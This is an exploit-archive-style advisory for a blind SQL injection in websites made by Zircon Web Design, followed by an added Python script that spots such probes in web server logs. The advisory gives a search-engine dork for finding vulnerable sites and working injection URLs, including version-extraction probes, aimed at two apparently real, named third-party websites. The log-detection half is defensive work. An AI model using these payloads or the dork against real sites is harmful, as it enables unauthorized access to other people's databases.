CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-89 | N/A | High |

Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2021-09-27 |

CVSS | EPSS | EPSSP |
---|---|---|
CVSS:8.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H | 0.24 | 0.76893 |

*********************************************************
#Exploit Title: Zircon Web Design - Blind SQL Injection Vulnerability
#Date: 2021-09-25
#Exploit Author: Behrouz Mansoori
#Google Dork: "Website Design and Hosted by Zircon Web Design"
#Category: webapps
#Tested On: Windows 10, Firefox

[+] First add "and true" and then "and false" to the end of the link:

* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false

### Demo 1:

* http://www.nlcrt.ca/main_page.php?id=4%27%20and%20true--+
* http://www.nlcrt.ca/main_page.php?id=4%27%20and%20false--+
* http://www.nlcrt.ca/main_page.php?id=4%27%20and%20substring(@@version,1,1)=1--+

### Demo 2:

* http://www.townofwabana.ca/iframe.php?id=185%27%20and%20false--+&cms_id=5&subcms_id=2
* http://www.townofwabana.ca/iframe.php?id=185%27%20and%20true--+&cms_id=5&subcms_id=2
* http://www.townofwabana.ca/iframe.php?id=185%27%20and%20substring(@@version,1,1)=1--+&cms_id=5&subcms_id=2

*********************************************************
#Discovered by: Behrouz Mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************
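
For site operators, the paired "and true" / "and false" requests and the `substring(@@version` probe shown above leave a recognizable trace in web server access logs. The following detection sketch is an added example, not part of the original advisory: the log lines are constructed (documentation IP addresses, combined log format assumed) and the function name `find_blind_sqli` is hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines for illustration; not taken from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Sep/2021:10:00:01 +0000] "GET /main_page.php?id=4 HTTP/1.1" 200 5120
203.0.113.7 - - [25/Sep/2021:10:00:05 +0000] "GET /main_page.php?id=4%27%20and%20true--+ HTTP/1.1" 200 5120
203.0.113.7 - - [25/Sep/2021:10:00:07 +0000] "GET /main_page.php?id=4%27%20and%20false--+ HTTP/1.1" 200 1830
203.0.113.7 - - [25/Sep/2021:10:00:09 +0000] "GET /main_page.php?id=4%27%20and%20substring(@@version,1,1)=1--+ HTTP/1.1" 200 1830
198.51.100.20 - - [25/Sep/2021:10:01:00 +0000] "GET /iframe.php?id=185&cms_id=5&subcms_id=2 HTTP/1.1" 200 900
198.51.100.20 - - [25/Sep/2021:10:01:30 +0000] "GET /search.php?q=true+and+false+friends HTTP/1.1" 200 700
"""

# A boolean literal must end the injected clause (comment marker or end of value),
# so ordinary search text such as "true and false friends" is not flagged.
BOOL_PROBE = re.compile(r"\b(?:and|or)\s+(true|false)\s*(?:--|#|$)", re.I)
VERSION_PROBE = re.compile(r"substring\s*\(\s*@@version", re.I)
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3}) (\d+)')

def find_blind_sqli(log_text):
    """Return one finding per (client, path, parameter) that shows blind-SQLi probing."""
    seen = defaultdict(lambda: {"true": set(), "false": set(), "version": 0})
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, target, _status, size = m.groups()
        url = urlsplit(target)
        # parse_qsl URL-decodes each value, so %27 and %20 are matched as ' and space.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            rec = seen[(client, url.path, name)]
            b = BOOL_PROBE.search(value)
            if b:
                rec[b.group(1).lower()].add(int(size))
            if VERSION_PROBE.search(value):
                rec["version"] += 1
    findings = []
    for (client, path, name), rec in seen.items():
        paired = bool(rec["true"] and rec["false"])
        if paired or rec["version"]:
            findings.append({
                "client": client, "path": path, "param": name,
                "paired_boolean_probe": paired,
                # Different body sizes for the true/false pair: the page answered the oracle.
                "oracle_visible": paired and rec["true"].isdisjoint(rec["false"]),
                "version_probes": rec["version"],
            })
    return findings
```

A finding with `oracle_visible` set means the application returned different content for the true and false conditions, so the parameter should be treated as injectable and moved to a parameterized query with integer validation.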